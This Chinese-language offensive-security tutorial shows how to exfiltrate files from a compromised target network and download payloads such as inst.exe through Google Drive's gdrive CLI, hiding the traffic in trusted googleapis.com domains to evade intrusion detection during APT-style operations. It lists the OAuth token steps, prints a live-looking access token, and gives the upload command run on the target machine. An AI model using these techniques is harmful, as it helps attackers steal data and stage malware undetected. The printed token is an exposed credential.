0x01 介绍✦
在定向apt大型目标的时候,目标内网系统会有各种流量入侵检测设备,为了动静小一点,也为了不在传输过大流量数据时暴露自己的c2,我们有必要用到第三方app/网址进行上传/下载,本次主要就 google drive 上传下载为例,进行实操详解。gdirve本身是一个跨平台语言go开发而成的命令行工具,能够兼容linux和win,并且流量域名全部走的是http://google.com的高可信域名。
0x02 实战和传输✦
0x02.1 测试储备
1. 测试环境:
- Windows10
- 杀软:360,360杀毒
2. 依赖条件:
- 能够上外网
- 一个google账号以及api (access token….)
先下载gdrive到本地的机器上。所有参数如下:
0x02.2 实战教程
我们先上wiki看下如何使用 gmail 申请access-token
It seems that this app has been blocked so you can’t get an authorization key by going to the URL that is presented when you run it. The following workaround seems to work:
1.进入https://developers.google.com/oauthplayground。
2.选择Drive API, 点击Authorize APIs。
3.点击 Exchange Authorization Codes for Token。
这样就拿到了Access Token:ya29.A0ARrdaM-vPnyNYOdORKc-j2WgGjgO7OVxXGhW3b80dxa-ukuqsn8lnSssJUWIT7Qu0au-UXrotTNTi4a_kw-O6mItkAplPbwDGxRloVrJA9KM9kx7tPhzTbMpyEryiOk7W4E1HsH7d6GnTCs4AetnHTND5QF1
注意,这里显示了,Access Token只有3597秒的有效期。
有了Access token以后,就可以开始在目标机器上传输文件了
gdrive.exe upload 2.tmp –access-token ya29.A0ARrdaM-vPnyNYOdORKc-j2WgGjgO7OVxXGhW3b80dxa-ukuqsn8lnSssJUWIT7Qu0au-UXrotTNTi4a_kw-O6mItkAplPbwDGxRloVrJA9KM9kx7tPhzTbMpyEryiOk7W4E1HsH7d6GnTCs4AetnHTND5QF1
#使用access-token作为认证,传输同级目录的2.tmp文件到自己的google drive网盘上。
我们抓包查看,走的是http://googleapis.com的域名,流量也是http://googleapis.com的流量。
回到我们的google drive上查看,可以看到2.temp已经上传了。
其他常见参数解释。
在目标机器上列出自己google drive上的所有云盘文件。
使用access-token作为认证,下载我们google-drive网盘上id为1X21v-LjM8RY9v_6lLMq16PL8uptqdADj的文件(也就是inst.exe)。
同步目录下所有的文件。
创建test目录。
把本地的1/文件夹里的所有东西,全部同步到云盘上的test目录。
00×03 思考和总结✦
- 其他的网盘有没有这种第三方的网址的api,能不能传输?
- 我们以后在某一个集团的内网的时候,能否根据内网所使用的服务器提供商自带的一些功能进行传输呢?(比如,在google vps里使用 google drive, 在azure云上的服务器使用onedrive文件传输),这一点就留给读者们继续拓展!
参考文献
